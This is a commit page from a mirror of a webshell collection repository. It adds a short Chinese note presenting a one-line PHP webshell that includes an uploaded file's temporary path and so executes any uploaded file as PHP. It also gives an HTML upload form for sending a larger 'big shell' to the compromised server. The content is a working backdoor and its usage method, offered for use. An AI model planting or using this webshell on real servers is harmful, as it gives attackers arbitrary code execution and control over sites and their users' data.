1
0
mirror of https://github.com/tennc/webshell.git synced 2026-01-11 17:19:02 +00:00
This commit is contained in:
tennc
2014-11-08 17:17:27 +08:00
parent 82ba3e540d
commit 9fea2a8727
2 changed files with 56 additions and 0 deletions

View File

@@ -0,0 +1,19 @@
另类PHP一句话小马
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径所以可以直接include进来。
<?php @include($_FILES['u']['tmp_name']);
使用方式也简单构造一个html文件写入如下代码:
<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data">
<input type="file" name='u'>
<button>shell</button>
</form>
from: <a href="http://www.zeroplace.cn/">www.zeroplace.cn</a>
选择你的php大马点shell运行
我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。
[url](http://www.zeroplace.cn/article.asp?id=906)